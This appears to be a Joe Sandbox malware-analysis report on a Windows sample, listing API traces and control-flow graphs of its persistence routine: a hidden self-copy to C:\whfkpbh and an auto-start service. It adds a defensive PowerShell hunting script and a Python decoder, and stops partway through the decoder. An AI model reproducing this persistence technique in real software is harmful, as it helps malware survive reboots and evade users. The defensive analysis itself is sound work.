• SetFileAttributesA.KERNEL32(?,00000002), ref: 009D912B
• SetFileAttributesA.KERNEL32(?,00000080), ref: 009D9186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 009D9265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 009D9370
                                                                                                                                                                                                              • Part of subcall function 009DA4E0: lstrlen.KERNEL32(?), ref: 009DA4FE
                                                                                                                                                                                                              • Part of subcall function 009DD500: lstrlen.KERNEL32(?,?,009DD630,?), ref: 009DD523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 009D96D4
                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 009D995E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000134), ref: 009D9AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000080), ref: 009D9AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 009D9B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 009D9B3B
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 009D9C52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 009D8CB2
                                                                                                                                                                                                              • Part of subcall function 009DBBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009DBC90
                                                                                                                                                                                                              • Part of subcall function 009DBBC0: Process32First.KERNEL32(00000000,?), ref: 009DBCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 009D86AE
                                                                                                                                                                                                              • Part of subcall function 009D2800: ExitProcess.KERNEL32 ref: 009D2842
                                                                                                                                                                                                              • Part of subcall function 00A008B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A00929
                                                                                                                                                                                                              • Part of subcall function 00A008B0: __aulldiv.LIBCMT ref: 00A00953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 009D9E32
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(C:\whfkpbh\amdrhfskpcu.exe,00000080), ref: 009D9E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,C:\whfkpbh\amdrhfskpcu.exe,00000000), ref: 009D9EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(C:\whfkpbh\amdrhfskpcu.exe,00000002), ref: 009D9EC5
                                                                                                                                                                                                              • Part of subcall function 009E0500: OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537
                                                                                                                                                                                                              • Part of subcall function 009E0500: CreateServiceA.ADVAPI32(00000000,012A0610,012A0610,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E0596
                                                                                                                                                                                                              • Part of subcall function 009E0500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 009E0615
                                                                                                                                                                                                              • Part of subcall function 009E0500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E062A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 009DA26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 009DA327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartStartupSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Users\user$C:\whfkpbh\amdrhfskpcu.exe$@L$}en
                                                                                                                                                                                                            • API String ID: 3864866415-903891288
                                                                                                                                                                                                            • Opcode ID: 29acd2b1c1a1010f2ce0f3ba3a617ec4e4b6e625a0da83f8dd31f2acc6b593f7
                                                                                                                                                                                                            • Instruction ID: 685f115f23c1d45fb74e56f843a3ebb737ccc7f35c10c3f1a43edcfe6a207124
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29acd2b1c1a1010f2ce0f3ba3a617ec4e4b6e625a0da83f8dd31f2acc6b593f7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 852333B9A00300DFD704EFE4FD86AA63BB4F7D9301B11851AE542962B5EB7588A3CF51

Control-flow Graph
(Text rendering of the graph widget; the executed/not-executed colouring is not recoverable.) Entry 9e5200 (call a00a20), then 9e52b2 GetVersionExA. API-calling blocks: CreateDirectoryA at 9e5496, 9e580c, 9e58ad, 9e5d10, 9e5e43 and 9e61f6; DeleteFileA followed by RemoveDirectoryA at 9e56d6 on one branch out of 9e562d (the other branch, 9e575d, skips both); GetTempPathA at 9e600d and 9e63c0; SetFileAttributesA at 9e653d, reached from 9e64f5, followed by calls to 9fa7e0 and 9de310 before return. The remaining blocks call the internal helpers 9d2f90, 9dc580, 9d13e0, 9de430, 9df0d0, 9dd530, 9dd670, 9ddef0, 9e1bb0, 9e1d90 and 9dd500 between the directory operations.
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00A5AE70), ref: 009E52CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 009E549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 009E56FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000), ref: 009E5743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 009E583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 009E58F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E5D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E5E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 009E6029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E61FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 009E63DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 009E655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 08967c55f8a1793ed7df720ba54a80414af752ee979969d8694cdd05e8816709
                                                                                                                                                                                                            • Instruction ID: e07f7c5fb51390047158890cbeeb334b28c0d4212725318e2cb1d5781558d462
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08967c55f8a1793ed7df720ba54a80414af752ee979969d8694cdd05e8816709
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EA276BAA40305CFC704DFE4FC86AA93BB4F7D5351B01C62AE542962B5EB358897CB41
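The two API lists above describe one persistence mechanism. The install routine (GetEnvironmentVariableA at 009D83DA through Sleep at 009DA327) resolves the user profile, takes three mutexes, clears attributes on its own image (SetFileAttributesA with 0x80 = FILE_ATTRIBUTE_NORMAL), copies itself to C:\whfkpbh\amdrhfskpcu.exe, re-hides the copy (0x2 = FILE_ATTRIBUTE_HIDDEN), then in subcall 009E0500 opens the SCM with access 2 = SC_MANAGER_CREATE_SERVICE, calls CreateServiceA with service type 0x110 = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS and start type 2 = SERVICE_AUTO_START (name and display name share one pointer, 012A0610, so they are the same string), sets a description (ChangeServiceConfig2A info level 1 = SERVICE_CONFIG_DESCRIPTION) and starts it. Function 009E5200 prepares the drop directory C:\whfkpbh\ (CreateDirectoryA, with DeleteFileA/RemoveDirectoryA and GetTempPathA on alternative paths) and hides its contents. The following triage script is an added example for hunting both artifacts on a host; it is not part of the Joe Sandbox report or the sample. The service name is not recoverable from the report (only a pointer is logged), so the script keys on binary path, file attributes and Authenticode status instead. The variable names, the $TrustedRoots and $BenignHiddenDirs lists, and the function names are this example's own assumptions; the only value taken from the report is the dropped path.

```powershell
# Added triage script, not part of the Joe Sandbox report. It hunts for the two
# artifacts the sample's install routine leaves behind: a service whose binary sits
# in a non-standard, hidden location (CopyFileA to C:\whfkpbh\amdrhfskpcu.exe,
# SetFileAttributesA(..., 0x2 = FILE_ATTRIBUTE_HIDDEN), CreateServiceA with start
# type 2 = SERVICE_AUTO_START) and a hidden directory created directly under the
# system drive root. The service name is not recoverable from the report, so the
# checks key on path, attributes and signature rather than on a name.

# Assumption: install roots considered benign for a service binary.
$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:ProgramData) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }
# Indicator taken from the report; extend with your own.
$KnownBadPaths = @('C:\whfkpbh\amdrhfskpcu.exe')
# Assumption: hidden-but-benign directories at the drive root on a stock install; tune per image.
$BenignHiddenDirs = @('ProgramData', '$WinREAgent', 'Recovery')

function Get-ServiceBinaryPath {
    # Reduce a raw service PathName to the executable path: expand environment
    # variables, drop NT-style prefixes, honour quoting, otherwise cut at the first
    # space (correct for the sample and for svchost-style "x.exe -k group" entries).
    param([string]$RawPath)
    if ([string]::IsNullOrWhiteSpace($RawPath)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($RawPath.Trim())
    $p = $p -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    return ($p -split '\s+')[0]
}

function Test-SuspiciousService {
    param([Parameter(Mandatory)]$Service)   # one Win32_Service instance
    $path = Get-ServiceBinaryPath $Service.PathName
    if (-not $path) { return $null }
    $reasons = @()
    if ($KnownBadPaths -contains $path) { $reasons += 'path matches report indicator' }
    $inTrusted = $false
    foreach ($root in $TrustedRoots) {
        if ($path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
    }
    if (-not $inTrusted) { $reasons += 'binary outside trusted install roots' }
    $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
    if ($item) {
        if (($item.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) {
            $reasons += 'binary has FILE_ATTRIBUTE_HIDDEN'
        }
        if ((Get-AuthenticodeSignature -LiteralPath $path).Status -ne 'Valid') {
            $reasons += 'binary not validly signed'
        }
    } else {
        $reasons += 'binary missing or unreadable (check for an unquoted path with spaces)'
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        Name      = $Service.Name
        StartMode = $Service.StartMode
        State     = $Service.State
        Path      = $path
        Reasons   = $reasons -join '; '
    }
}

function Get-HiddenRootDirectories {
    # The sample creates C:\whfkpbh\ (CreateDirectoryA) and hides what it drops
    # there; list hidden directories under the system drive root that are neither
    # System-flagged nor on the benign list.
    $root = $env:SystemDrive + '\'
    Get-ChildItem -LiteralPath $root -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object {
            (($_.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) -and
            (($_.Attributes -band [IO.FileAttributes]::System) -eq 0) -and
            ($BenignHiddenDirs -notcontains $_.Name)
        } | Select-Object FullName, Attributes, CreationTime
}

Get-CimInstance -ClassName Win32_Service |
    ForEach-Object { Test-SuspiciousService -Service $_ } |
    Where-Object { $_ } | Format-Table -AutoSize
Get-HiddenRootDirectories | Format-Table -AutoSize
```

Run it from an elevated PowerShell so that Get-AuthenticodeSignature and Get-Item -Force can read every service binary. On an infected host the sample's service shows up with all three reasons (report indicator, outside trusted roots, hidden) and C:\whfkpbh appears in the second table; on a clean host expect a short list of unsigned third-party services to review by hand.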

Control-flow Graph
(Text rendering of the graph widget; the executed/not-executed colouring is not recoverable.) Entry 9ea930 → 9ea9b4 (calls 9d2f90, 9d13e0, 9e1bb0) GetProcessHeap → 9eab54 LoadLibraryA (failure branch 9eabb1) → 9eac8d GetProcAddress; on failure 9eacf0 FreeLibrary, otherwise 9ead28 HeapAlloc → 9eadfa GetAdaptersInfo → 9eae30 HeapFree → 9eae8a HeapAlloc → 9eaf83 GetAdaptersInfo, a sequence consistent with the size-query-then-fill calling convention of GetAdaptersInfo, with FreeLibrary on the error paths 9eadd4 and 9eaeaa. The adapter list is then walked in the loop 9eb0b3 to 9eb5c8 (via 9fb260, 9d2f90, 9d13e0 and 9e1bb0), 9fa7e0 is called at 9eb5d1 and 9eb659, and everything is released at 9eb6ad HeapFree + FreeLibrary.
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID: #~\
                                                                                                                                                                                                            • API String ID: 54951025-95464956
                                                                                                                                                                                                            • Opcode ID: d121cfc44e5143c08b23175d4c3d5b0d863cfbd20a62ec4ed443656288b80dea
                                                                                                                                                                                                            • Instruction ID: d280bcc8c4a0822153c717f2e8b3fd0c80568ca51f5a02c2ff67201078658da7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d121cfc44e5143c08b23175d4c3d5b0d863cfbd20a62ec4ed443656288b80dea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A72117EA01205CFC304DFE5FC856A63BB4FB99321B11851AE845C72B4E73698A3CB91

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 840 9e0500-9e0559 OpenSCManagerA 841 9e07be-9e07d2 840->841 842 9e055f-9e05bc CreateServiceA 840->842 843 9e05be-9e05ca 842->843 844 9e05d0-9e05d2 842->844 843->844 845 9e06bc-9e06cc 844->845 846 9e05d8-9e067c ChangeServiceConfig2A StartServiceA 844->846 849 9e06ce-9e06db 845->849 850 9e06e1-9e0714 OpenServiceA 845->850 847 9e067e-9e06a2 846->847 848 9e06a4 846->848 853 9e06a6-9e06b7 CloseServiceHandle 847->853 848->853 849->850 851 9e0716-9e075c StartServiceA CloseServiceHandle 850->851 852 9e0773-9e0778 850->852 851->852 854 9e075e-9e076d 851->854 855 9e077e-9e078d 852->855 853->855 854->852 856 9e078f-9e07a1 855->856 857 9e07a7-9e07b8 CloseServiceHandle 855->857 856->857 857->841
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,012A0610,012A0610,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E0596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 009E0615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E062A
                                                                                                                                                                                                            • CloseServiceHandle.SECHOST(00000000), ref: 009E06A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,012A0610,00000010), ref: 009E06EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009E073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009E07A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: ea63547929bc2555587b95f9949ad8241b2fa675acfa1459c4245c1549414b89
                                                                                                                                                                                                            • Instruction ID: aeb99cb736fc88db5100af5a83bb45803ad5e40b5a8415c946856cfb3bee887b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea63547929bc2555587b95f9949ad8241b2fa675acfa1459c4245c1549414b89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B561CB3AA41310EFD301DFE4FC46BAA3BB4FB96B12F118505E441AA2B4E77558A3CB45

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 923 9e0920-9e0943 924 9e095e-9e099c 923->924 925 9e0945-9e0958 923->925 926 9e099e-9e09a8 924->926 927 9e09aa-9e09b7 924->927 925->924 928 9e09be-9e0a34 call 9f3110 926->928 927->928 931 9e0a3a-9e0aa5 call 9d2f90 GetProcAddress 928->931 932 9e0bd4-9e0bea 928->932 939 9e0aa7-9e0ab1 931->939 940 9e0ab3-9e0ac0 931->940 934 9e0bec-9e0bf4 932->934 935 9e0bfa-9e0c01 932->935 934->935 937 9e0c58-9e0c7c 935->937 938 9e0c03-9e0c18 CryptGenRandom 935->938 942 9e0c7e-9e0c92 937->942 943 9e0c94 937->943 938->937 941 9e0c1a-9e0c52 938->941 944 9e0ac7-9e0b44 call 9d2f90 call 9e1bb0 GetProcAddress call 9e1bb0 939->944 940->944 941->937 945 9e0c9e-9e0ca6 942->945 943->945 963 9e0b9d-9e0bb7 944->963 964 9e0b46-9e0b4d 944->964 947 9e0cac-9e0cda call 9d2860 * 2 945->947 948 9e0d64-9e0da2 call 9ffcc0 945->948 959 9e0cdc-9e0d02 947->959 960 9e0d08-9e0d58 call 9d2860 * 2 947->960 959->960 960->948 972 9e0d5a 960->972 965 9e0bbd-9e0bd1 963->965 964->963 967 9e0b4f-9e0b5b 964->967 965->932 969 9e0b62-9e0b64 967->969 969->963 971 9e0b66-9e0b9b 969->971 971->965 972->948
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 009E0A8A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 009E0B05
                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(00000000,00000004,?,?), ref: 009E0C10
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$CryptRandom
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 646182245-0
                                                                                                                                                                                                            • Opcode ID: a94674aae1e46f174f4a8b5766d2b2705e53b2d6d22b3a1366dd5aa0df6281bf
                                                                                                                                                                                                            • Instruction ID: f35f98a79a661da264ade6db8b05c44f7a94eaffd252c5ef770b7bc61b081324
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94674aae1e46f174f4a8b5766d2b2705e53b2d6d22b3a1366dd5aa0df6281bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08B110BAA00355CBC710DFE5FC856A537B4FBD6311B11822AE445972B4E3724897CF85

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 1019 9f9b00-9f9ba3 call 9df230 1022 9f9baf-9f9bdb call a00a20 call 9ef150 1019->1022 1023 9f9ba5 1019->1023 1028 9f9bdd-9f9be9 call 9e2970 1022->1028 1029 9f9beb 1022->1029 1023->1022 1031 9f9bf5-9f9c2b 1028->1031 1029->1031 1033 9f9c2d-9f9c3a 1031->1033 1034 9f9c40-9f9c51 GetComputerNameA 1031->1034 1033->1034 1035 9f9c53-9f9cca call 9d2f90 call 9d13e0 call 9e1bb0 1034->1035 1036 9f9cd0-9f9ce6 1034->1036 1035->1036 1037 9f9d1c-9f9dea call 9d2f90 call 9d13e0 call 9e1bb0 call 9dd530 1036->1037 1038 9f9ce8-9f9d0a 1036->1038 1054 9f9dfe-9f9e3c call 9e2c30 1037->1054 1055 9f9dec-9f9df8 1037->1055 1038->1037 1040 9f9d0c-9f9d17 1038->1040 1040->1037 1058 9f9e3e-9f9e53 1054->1058 1059 9f9e5a-9f9ed6 call 9d13e0 call 9dc580 call 9fa7e0 1054->1059 1055->1054 1058->1059 1066 9f9ed8-9f9efb 1059->1066 1067 9f9f02-9f9f4e call 9ea930 1059->1067 1066->1067 1070 9f9f5a-9fa033 call 9dd500 call a001a0 call a01050 call 9de310 call 9e2c30 1067->1070 1071 9f9f50 1067->1071 1082 9fa035-9fa063 1070->1082 1083 9fa092-9fa1b5 call a001a0 call a01050 call 9de310 call 9e2c30 call a001a0 call a01050 call 9de310 call 9e2c30 call a001a0 call a01050 call 9de310 1070->1083 1071->1070 1084 9fa07e-9fa08b 1082->1084 1085 9fa065-9fa07c 1082->1085 1108 9fa1b7-9fa1c1 1083->1108 1109 9fa1c3-9fa1d0 1083->1109 1084->1083 1085->1083 1110 9fa1d7-9fa254 call 9e2c30 call a001a0 call a01050 call 9de310 call 9e2c30 1108->1110 1109->1110 1121 9fa256-9fa26e 1110->1121 1122 9fa274-9fa37b call 9d2f90 call a001a0 call a01050 call 9de310 call 9e1bb0 call 9e2c30 call a001a0 call a01050 call 9de310 1110->1122 1121->1122 1141 9fa37d 1122->1141 1142 9fa387-9fa3d4 call 9e2c30 call a001a0 call a01050 call 9de310 1122->1142 1141->1142 1151 9fa3f8-9fa581 call 9e2c30 call 9e2f60 call 9e6600 call a001a0 call 
a01050 call 9de310 call 9e2c30 call 9f99f0 call a001a0 call a01050 call 9de310 call 9dd670 call 9ddef0 call 9e97b0 call 9ed990 1142->1151 1152 9fa3d6-9fa3f2 1142->1152 1183 9fa59c-9fa5c4 call 9dd670 call 9ddef0 call 9e4290 1151->1183 1184 9fa583-9fa58d 1151->1184 1152->1151 1192 9fa5c6-9fa5de 1183->1192 1193 9fa5e5-9fa607 call 9dae40 1183->1193 1184->1183 1186 9fa58f-9fa595 1184->1186 1186->1183 1192->1193 1196 9fa62c-9fa636 call 9f0480 1193->1196 1197 9fa609-9fa620 1193->1197 1200 9fa63b-9fa679 call 9fa7e0 1196->1200 1197->1196 1198 9fa622 1197->1198 1198->1196 1203 9fa67b-9fa690 1200->1203 1204 9fa696-9fa6ec call 9fa7e0 * 2 1200->1204 1203->1204 1209 9fa6ee-9fa708 1204->1209 1210 9fa738-9fa74b call 9de310 call 9fb940 1204->1210 1212 9fa70a-9fa727 call 9de310 call 9fb940 1209->1212 1213 9fa728-9fa733 1209->1213 1213->1210
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000010), ref: 009F9C49
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3545744682-0
                                                                                                                                                                                                            • Opcode ID: 6f296f34a4c9752ddb1679845c494357c0787bfa2cd55c4c5f19e59684ca0f67
                                                                                                                                                                                                            • Instruction ID: 95f65c5bd640e32f7e231da41fa8d857c03dea76c500975c377f25e61f2c2a06
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f296f34a4c9752ddb1679845c494357c0787bfa2cd55c4c5f19e59684ca0f67
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD62CDB9900209CBC704EFE0FD92AFA77B8FB95301F10806AE146961B5EB315A97CF51
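The API listings above print every call's stack arguments as raw hex, so the values that make the service installer a persistence mechanism (OpenSCManagerA with access 0x2, CreateServiceA with access 0xF01FF, type 0x110 and start type 0x2, OpenServiceA with 0x10) have to be decoded by hand, as do the CryptGenRandom length and the CreateProcessA creation flags 0x8 listed further down. The following script is an added example and not part of the Joe Sandbox report or of the analysed sample: it parses lines in the listing format used on this page, maps the numeric arguments of the service and process-creation calls to their Windows SDK constant names, and flags the "open SCM for creation, create an AUTO_START service, start it" sequence. The constant tables are from winsvc.h and winbase.h; the line regex, the DECODERS table, the detection rule and the function names are this example's own assumptions, and REPORT_LINES is copied verbatim from the listings on this page.

```python
"""Decode the hex arguments in Joe Sandbox API-listing lines into Win32 constant
names and flag the service-installation sequence they show. Added example, not
Joe Sandbox code: the line format and REPORT_LINES come from this report, the
tables from the Windows SDK headers, the detection rule is this example's own."""
import re
from collections import namedtuple

# One listing line: "• OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537"
_LINE = re.compile(r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
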